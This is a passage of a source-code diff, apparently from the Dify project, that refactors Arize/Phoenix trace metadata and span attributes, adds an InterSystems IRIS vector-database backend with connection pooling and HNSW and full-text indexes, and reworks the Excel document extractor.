-494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "suggested_question", - "status": trace_info.status, - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens, - "ls_provider": trace_info.model_provider or "", - "ls_model_name": trace_info.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.status or "", + status_message=trace_info.status_message or "", + level=trace_info.level or "", + trace_entity_type="suggested_question", + total_tokens=trace_info.total_tokens or 0, + from_account_id=trace_info.from_account_id or "", + agent_based=trace_info.agent_based or False, + from_source=trace_info.from_source or "", + model_provider=trace_info.model_provider or "", + model_id=trace_info.model_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -518,10 +569,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.suggested_question, ensure_ascii=False), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, @@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "dataset_retrieval", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="dataset_retrieval", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -560,20 +615,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - "start_time": start_time.isoformat() if start_time else "", - "end_time": end_time.isoformat() if end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, ) try: - if trace_info.message_data.error: - set_span_status(span, trace_info.message_data.error) + if trace_info.error: + set_span_status(span, trace_info.error) else: set_span_status(span) finally: @@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance): logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False), - } + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="tool", + tool_config=safe_json_dumps(trace_info.tool_config), + time_cost=trace_info.time_cost or 0, + file_url=trace_info.file_url or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) root_span_context = self.propagator.extract(carrier=self.carrier) - tool_params_str = ( - json.dumps(trace_info.tool_parameters, ensure_ascii=False) - if isinstance(trace_info.tool_parameters, dict) - else str(trace_info.tool_parameters) - ) - span = self.tracer.start_span( name=trace_info.tool_name, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.TOOL_NAME: trace_info.tool_name, - SpanAttributes.TOOL_PARAMETERS: tool_params_str, + SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def generate_name_trace(self, trace_info: GenerateNameTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.") return - metadata = { - "project_name": self.project, - "message_id": trace_info.message_id, - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="generate_name", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + conversation_id=trace_info.conversation_id or "", + tenant_id=trace_info.tenant_id, + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id self.ensure_root_span(dify_trace_id) @@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.GENERATE_NAME_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, - "start_time": trace_info.start_time.isoformat() if trace_info.start_time else "", - "end_time": trace_info.end_time.isoformat() if trace_info.end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}") def get_project_url(self): + """Build a redirect URL that forwards the user to the correct project for Arize/Phoenix.""" try: - if self.arize_phoenix_config.endpoint == "https://otlp.arize.com": - return "https://app.arize.com/" - else: - return f"{self.arize_phoenix_config.endpoint}/projects/" + project_name = self.arize_phoenix_config.project + endpoint = self.arize_phoenix_config.endpoint.rstrip("/") + + # Arize + if isinstance(self.arize_phoenix_config, ArizeConfig): + return f"https://app.arize.com/?redirect_project_name={project_name}" + + # Phoenix + return f"{endpoint}/projects/?redirect_project_name={project_name}" + except Exception as e: - logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True) - raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}") + logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True) + raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}") def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]: - """Helper method to construct LLM attributes with passed prompts.""" - attributes = {} + """Construct LLM attributes with passed prompts for Arize/Phoenix.""" + attributes: dict[str, str] = {} + + def set_attribute(path: str, value: object) -> None: + """Store an attribute safely as a string.""" + if value is None: + return + try: + if isinstance(value, (dict, list)): + value = safe_json_dumps(value) + attributes[path] = str(value) + except Exception: + attributes[path] = str(value) + + def set_message_attribute(message_index: int, key: str, value: object) -> None: + path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}" + set_attribute(path, value) + + def set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None: + """Extract and assign tool call details safely.""" + if not tool_call: + return + + def safe_get(obj, key, default=None): + if isinstance(obj, dict): + return obj.get(key, default) + return getattr(obj, key, default) + + function_obj = safe_get(tool_call, "function", {}) + function_name = safe_get(function_obj, "name", "") + function_args = safe_get(function_obj, "arguments", {}) + call_id = safe_get(tool_call, "id", "") + + base_path = ( + f"{SpanAttributes.LLM_INPUT_MESSAGES}." + f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}" + ) + + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id) + + # Handle list of messages if isinstance(prompts, list): - for i, msg in enumerate(prompts): - if isinstance(msg, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "") - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user") - # todo: handle assistant and tool role messages, as they don't always - # have a text field, but may have a tool_calls field instead - # e.g. 'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58', - # 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]} - elif isinstance(prompts, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts) - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" - elif isinstance(prompts, str): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" + for message_index, message in enumerate(prompts): + if not isinstance(message, dict): + continue + + role = message.get("role", "user") + content = message.get("text") or message.get("content") or "" + + set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role) + set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content) + + tool_calls = message.get("tool_calls") or [] + if isinstance(tool_calls, list): + for tool_index, tool_call in enumerate(tool_calls): + set_tool_call_attributes(message_index, tool_index, tool_call) + + # Handle single dict or plain string prompt + elif isinstance(prompts, (dict, str)): + set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts) + set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user") return attributes diff --git a/api/core/plugin/impl/base.py b/api/core/plugin/impl/base.py index a1c84bd5d9..7bb2749afa 100644 --- a/api/core/plugin/impl/base.py +++ b/api/core/plugin/impl/base.py @@ -39,7 +39,7 @@ from core.trigger.errors import ( plugin_daemon_inner_api_baseurl = URL(str(dify_config.PLUGIN_DAEMON_URL)) _plugin_daemon_timeout_config = cast( float | httpx.Timeout | None, - getattr(dify_config, "PLUGIN_DAEMON_TIMEOUT", 300.0), + getattr(dify_config, "PLUGIN_DAEMON_TIMEOUT", 600.0), ) plugin_daemon_request_timeout: httpx.Timeout | None if _plugin_daemon_timeout_config is None: diff --git a/api/core/rag/datasource/vdb/iris/__init__.py b/api/core/rag/datasource/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/rag/datasource/vdb/iris/iris_vector.py b/api/core/rag/datasource/vdb/iris/iris_vector.py new file mode 100644 index 0000000000..b1bfabb76e --- /dev/null +++ b/api/core/rag/datasource/vdb/iris/iris_vector.py @@ -0,0 +1,407 @@ +"""InterSystems IRIS vector database implementation for Dify. + +This module provides vector storage and retrieval using IRIS native VECTOR type +with HNSW indexing for efficient similarity search. +""" + +from __future__ import annotations + +import json +import logging +import threading +import uuid +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any + +from configs import dify_config +from configs.middleware.vdb.iris_config import IrisVectorConfig +from core.rag.datasource.vdb.vector_base import BaseVector +from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory +from core.rag.datasource.vdb.vector_type import VectorType +from core.rag.embedding.embedding_base import Embeddings +from core.rag.models.document import Document +from extensions.ext_redis import redis_client +from models.dataset import Dataset + +if TYPE_CHECKING: + import iris +else: + try: + import iris + except ImportError: + iris = None # type: ignore[assignment] + +logger = logging.getLogger(__name__) + +# Singleton connection pool to minimize IRIS license usage +_pool_lock = threading.Lock() +_pool_instance: IrisConnectionPool | None = None + + +def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool: + """Get or create the global IRIS connection pool (singleton pattern).""" + global _pool_instance # pylint: disable=global-statement + with _pool_lock: + if _pool_instance is None: + logger.info("Initializing IRIS connection pool") + _pool_instance = IrisConnectionPool(config) + return _pool_instance + + +class IrisConnectionPool: + """Thread-safe connection pool for IRIS database.""" + + def __init__(self, config: IrisVectorConfig) -> None: + self.config = config + self._pool: list[Any] = [] + self._lock = threading.Lock() + self._min_size = config.IRIS_MIN_CONNECTION + self._max_size = config.IRIS_MAX_CONNECTION + self._in_use = 0 + self._schemas_initialized: set[str] = set() # Cache for initialized schemas + self._initialize_pool() + + def _initialize_pool(self) -> None: + for _ in range(self._min_size): + self._pool.append(self._create_connection()) + + def _create_connection(self) -> Any: + return iris.connect( + hostname=self.config.IRIS_HOST, + port=self.config.IRIS_SUPER_SERVER_PORT, + namespace=self.config.IRIS_DATABASE, + username=self.config.IRIS_USER, + password=self.config.IRIS_PASSWORD, + ) + + def get_connection(self) -> Any: + """Get a connection from pool or create new if available.""" + with self._lock: + if self._pool: + conn = self._pool.pop() + self._in_use += 1 + return conn + if self._in_use < self._max_size: + conn = self._create_connection() + self._in_use += 1 + return conn + raise RuntimeError("Connection pool exhausted") + + def return_connection(self, conn: Any) -> None: + """Return connection to pool after validating it.""" + if not conn: + return + + # Validate connection health + is_valid = False + try: + cursor = conn.cursor() + cursor.execute("SELECT 1") + cursor.close() + is_valid = True + except (OSError, RuntimeError) as e: + logger.debug("Connection validation failed: %s", e) + try: + conn.close() + except (OSError, RuntimeError): + pass + + with self._lock: + self._pool.append(conn if is_valid else self._create_connection()) + self._in_use -= 1 + + def ensure_schema_exists(self, schema: str) -> None: + """Ensure schema exists in IRIS database. + + This method is idempotent and thread-safe. It uses a memory cache to avoid + redundant database queries for already-verified schemas. + + Args: + schema: Schema name to ensure exists + + Raises: + Exception: If schema creation fails + """ + # Fast path: check cache first (no lock needed for read-only set lookup) + if schema in self._schemas_initialized: + return + + # Slow path: acquire lock and check again (double-checked locking) + with self._lock: + if schema in self._schemas_initialized: + return + + # Get a connection to check/create schema + conn = self._pool[0] if self._pool else self._create_connection() + cursor = conn.cursor() + try: + # Check if schema exists using INFORMATION_SCHEMA + check_sql = """ + SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA + WHERE SCHEMA_NAME = ? + """ + cursor.execute(check_sql, (schema,)) # Must be tuple or list + exists = cursor.fetchone()[0] > 0 + + if not exists: + # Schema doesn't exist, create it + cursor.execute(f"CREATE SCHEMA {schema}") + conn.commit() + logger.info("Created schema: %s", schema) + else: + logger.debug("Schema already exists: %s", schema) + + # Add to cache to skip future checks + self._schemas_initialized.add(schema) + + except Exception as e: + conn.rollback() + logger.exception("Failed to ensure schema %s exists", schema) + raise + finally: + cursor.close() + + def close_all(self) -> None: + """Close all connections (application shutdown only).""" + with self._lock: + for conn in self._pool: + try: + conn.close() + except (OSError, RuntimeError): + pass + self._pool.clear() + self._in_use = 0 + self._schemas_initialized.clear() + + +class IrisVector(BaseVector): + """IRIS vector database implementation using native VECTOR type and HNSW indexing.""" + + def __init__(self, collection_name: str, config: IrisVectorConfig) -> None: + super().__init__(collection_name) + self.config = config + self.table_name = f"embedding_{collection_name}".upper() + self.schema = config.IRIS_SCHEMA or "dify" + self.pool = get_iris_pool(config) + + def get_type(self) -> str: + return VectorType.IRIS + + @contextmanager + def _get_cursor(self): + """Context manager for database cursor with connection pooling.""" + conn = self.pool.get_connection() + cursor = conn.cursor() + try: + yield cursor + conn.commit() + except Exception: + conn.rollback() + raise + finally: + cursor.close() + self.pool.return_connection(conn) + + def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]: + dimension = len(embeddings[0]) + self._create_collection(dimension) + return self.add_texts(texts, embeddings) + + def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]: + """Add documents with embeddings to the collection.""" + added_ids = [] + with self._get_cursor() as cursor: + for i, doc in enumerate(documents): + doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4()) + metadata = json.dumps(doc.metadata) if doc.metadata else "{}" + embedding_str = json.dumps(embeddings[i]) + + sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)" + cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str)) + added_ids.append(doc_id) + + return added_ids + + def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin + try: + with self._get_cursor() as cursor: + sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?" + cursor.execute(sql, (id,)) + return cursor.fetchone() is not None + except (OSError, RuntimeError, ValueError): + return False + + def delete_by_ids(self, ids: list[str]) -> None: + if not ids: + return + + with self._get_cursor() as cursor: + placeholders = ",".join(["?" for _ in ids]) + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})" + cursor.execute(sql, ids) + + def delete_by_metadata_field(self, key: str, value: str) -> None: + """Delete documents by metadata field (JSON LIKE pattern matching).""" + with self._get_cursor() as cursor: + pattern = f'%"{key}": "{value}"%' + sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?" + cursor.execute(sql, (pattern,)) + + def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]: + """Search similar documents using VECTOR_COSINE with HNSW index.""" + top_k = kwargs.get("top_k", 4) + score_threshold = float(kwargs.get("score_threshold") or 0.0) + embedding_str = json.dumps(query_vector) + + with self._get_cursor() as cursor: + sql = f""" + SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score + FROM {self.schema}.{self.table_name} + ORDER BY score DESC + """ + cursor.execute(sql, (embedding_str,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 4: + text, meta_str, score = row[1], row[2], float(row[3]) + if score >= score_threshold: + metadata = json.loads(meta_str) if meta_str else {} + metadata["score"] = score + docs.append(Document(page_content=text, metadata=metadata)) + return docs + + def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]: + """Search documents by full-text using iFind index or fallback to LIKE search.""" + top_k = kwargs.get("top_k", 5) + + with self._get_cursor() as cursor: + if self.config.IRIS_TEXT_INDEX: + # Use iFind full-text search with index + text_index_name = f"idx_{self.table_name}_text" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE %ID %FIND search_index({text_index_name}, ?) + """ + cursor.execute(sql, (query,)) + else: + # Fallback to LIKE search (inefficient for large datasets) + query_pattern = f"%{query}%" + sql = f""" + SELECT TOP {top_k} id, text, meta + FROM {self.schema}.{self.table_name} + WHERE text LIKE ? + """ + cursor.execute(sql, (query_pattern,)) + + docs = [] + for row in cursor.fetchall(): + if len(row) >= 3: + metadata = json.loads(row[2]) if row[2] else {} + docs.append(Document(page_content=row[1], metadata=metadata)) + + if not docs: + logger.info("Full-text search for '%s' returned no results", query) + + return docs + + def delete(self) -> None: + """Delete the entire collection (drop table - permanent).""" + with self._get_cursor() as cursor: + sql = f"DROP TABLE {self.schema}.{self.table_name}" + cursor.execute(sql) + + def _create_collection(self, dimension: int) -> None: + """Create table with VECTOR column and HNSW index. + + Uses Redis lock to prevent concurrent creation attempts across multiple + API server instances (api, worker, worker_beat). + """ + cache_key = f"vector_indexing_{self._collection_name}" + lock_name = f"{cache_key}_lock" + + with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager + if redis_client.get(cache_key): + return + + # Ensure schema exists (idempotent, cached after first call) + self.pool.ensure_schema_exists(self.schema) + + with self._get_cursor() as cursor: + # Create table with VECTOR column + sql = f""" + CREATE TABLE {self.schema}.{self.table_name} ( + id VARCHAR(255) PRIMARY KEY, + text CLOB, + meta CLOB, + embedding VECTOR(DOUBLE, {dimension}) + ) + """ + logger.info("Creating table: %s.%s", self.schema, self.table_name) + cursor.execute(sql) + + # Create HNSW index for vector similarity search + index_name = f"idx_{self.table_name}_embedding" + sql_index = ( + f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} " + "(embedding) AS HNSW(Distance='Cosine')" + ) + logger.info("Creating HNSW index: %s", index_name) + cursor.execute(sql_index) + logger.info("HNSW index created successfully: %s", index_name) + + # Create full-text search index if enabled + logger.info( + "IRIS_TEXT_INDEX config value: %s (type: %s)", + self.config.IRIS_TEXT_INDEX, + type(self.config.IRIS_TEXT_INDEX), + ) + if self.config.IRIS_TEXT_INDEX: + text_index_name = f"idx_{self.table_name}_text" + language = self.config.IRIS_TEXT_INDEX_LANGUAGE + # Fixed: Removed extra parentheses and corrected syntax + sql_text_index = f""" + CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text) + AS %iFind.Index.Basic + (LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0) + """ + logger.info("Creating text index: %s with language: %s", text_index_name, language) + logger.info("SQL for text index: %s", sql_text_index) + cursor.execute(sql_text_index) + logger.info("Text index created successfully: %s", text_index_name) + else: + logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled") + + redis_client.set(cache_key, 1, ex=3600) + + +class IrisVectorFactory(AbstractVectorFactory): + """Factory for creating IrisVector instances.""" + + def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector: + if dataset.index_struct_dict: + class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"] + collection_name = class_prefix + else: + dataset_id = dataset.id + collection_name = Dataset.gen_collection_name_by_id(dataset_id) + index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name) + dataset.index_struct = json.dumps(index_struct_dict) + + return IrisVector( + collection_name=collection_name, + config=IrisVectorConfig( + IRIS_HOST=dify_config.IRIS_HOST, + IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT, + IRIS_USER=dify_config.IRIS_USER, + IRIS_PASSWORD=dify_config.IRIS_PASSWORD, + IRIS_DATABASE=dify_config.IRIS_DATABASE, + IRIS_SCHEMA=dify_config.IRIS_SCHEMA, + IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL, + IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION, + IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION, + IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX, + IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE, + ), + ) diff --git a/api/core/rag/datasource/vdb/vector_factory.py b/api/core/rag/datasource/vdb/vector_factory.py index 3a47241293..b9772b3c08 100644 --- a/api/core/rag/datasource/vdb/vector_factory.py +++ b/api/core/rag/datasource/vdb/vector_factory.py @@ -163,7 +163,7 @@ class Vector: from core.rag.datasource.vdb.lindorm.lindorm_vector import LindormVectorStoreFactory return LindormVectorStoreFactory - case VectorType.OCEANBASE: + case VectorType.OCEANBASE | VectorType.SEEKDB: from core.rag.datasource.vdb.oceanbase.oceanbase_vector import OceanBaseVectorFactory return OceanBaseVectorFactory @@ -187,6 +187,10 @@ class Vector: from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory return ClickzettaVectorFactory + case VectorType.IRIS: + from core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory + + return IrisVectorFactory case _: raise ValueError(f"Vector store {vector_type} is not supported.") diff --git a/api/core/rag/datasource/vdb/vector_type.py b/api/core/rag/datasource/vdb/vector_type.py index bc7d93a2e0..bd99a31446 100644 --- a/api/core/rag/datasource/vdb/vector_type.py +++ b/api/core/rag/datasource/vdb/vector_type.py @@ -27,8 +27,10 @@ class VectorType(StrEnum): UPSTASH = "upstash" TIDB_ON_QDRANT = "tidb_on_qdrant" OCEANBASE = "oceanbase" + SEEKDB = "seekdb" OPENGAUSS = "opengauss" TABLESTORE = "tablestore" HUAWEI_CLOUD = "huawei_cloud" MATRIXONE = "matrixone" CLICKZETTA = "clickzetta" + IRIS = "iris" diff --git a/api/core/rag/extractor/entity/extract_setting.py b/api/core/rag/extractor/entity/extract_setting.py index c3bfbce98f..0c42034073 100644 --- a/api/core/rag/extractor/entity/extract_setting.py +++ b/api/core/rag/extractor/entity/extract_setting.py @@ -10,7 +10,7 @@ class NotionInfo(BaseModel): """ credential_id: str | None = None - notion_workspace_id: str + notion_workspace_id: str | None = "" notion_obj_id: str notion_page_type: str document: Document | None = None diff --git a/api/core/rag/extractor/excel_extractor.py b/api/core/rag/extractor/excel_extractor.py index ea9c6bd73a..875bfd1439 100644 --- a/api/core/rag/extractor/excel_extractor.py +++ b/api/core/rag/extractor/excel_extractor.py @@ -1,7 +1,7 @@ """Abstract interface for document loader implementations.""" import os -from typing import cast +from typing import TypedDict import pandas as pd from openpyxl import load_workbook @@ -10,6 +10,12 @@ from core.rag.extractor.extractor_base import BaseExtractor from core.rag.models.document import Document +class Candidate(TypedDict): + idx: int + count: int + map: dict[int, str] + + class ExcelExtractor(BaseExtractor): """Load Excel files. @@ -30,32 +36,38 @@ class ExcelExtractor(BaseExtractor): file_extension = os.path.splitext(self._file_path)[-1].lower() if file_extension == ".xlsx": - wb = load_workbook(self._file_path, data_only=True) - for sheet_name in wb.sheetnames: - sheet = wb[sheet_name] - data = sheet.values - cols = next(data, None) - if cols is None: - continue - df = pd.DataFrame(data, columns=cols) - - df.dropna(how="all", inplace=True) - - for index, row in df.iterrows(): - page_content = [] - for col_index, (k, v) in enumerate(row.items()): - if pd.notna(v): - cell = sheet.cell( - row=cast(int, index) + 2, column=col_index + 1 - ) # +2 to account for header and 1-based index - if cell.hyperlink: - value = f"[{v}]({cell.hyperlink.target})" - page_content.append(f'"{k}":"{value}"') - else: - page_content.append(f'"{k}":"{v}"') - documents.append( - Document(page_content=";".join(page_content), metadata={"source": self._file_path}) - ) + wb = load_workbook(self._file_path, read_only=True, data_only=True) + try: + for sheet_name in wb.sheetnames: + sheet = wb[sheet_name] + header_row_idx, column_map, max_col_idx = self._find_header_and_columns(sheet) + if not column_map: + continue + start_row = header_row_idx + 1 + for row in sheet.iter_rows(min_row=start_row, max_col=max_col_idx, values_only=False): + if all(cell.value is None for cell in row): + continue + page_content = [] + for col_idx, cell in enumerate(row): + value = cell.value + if col_idx in column_map: + col_name = column_map[col_idx] + if hasattr(cell, "hyperlink") and cell.hyperlink: + target = getattr(cell.hyperlink, "target", None) + if target: + value = f"[{value}]({target})" + if value is None: + value = "" + elif not isinstance(value, str): + value = str(value) + value = value.strip().replace('"', '\\"') + page_content.append(f'"{col_name}":"{value}"') + if page_content: + documents.append( + Document(page_content=";".join(page_content), metadata={"source": self._file_path}) + ) + finally: + wb.close() elif file_extension == ".xls": excel_file = pd.ExcelFile(self._file_path, engine="xlrd") @@ -63,9 +75,9 @@ class ExcelExtractor(BaseExtractor): df = excel_file.parse(sheet_name=excel_sheet_name) df.dropna(how="all", inplace=True) - for _, row in df.iterrows(): + for _, series_row 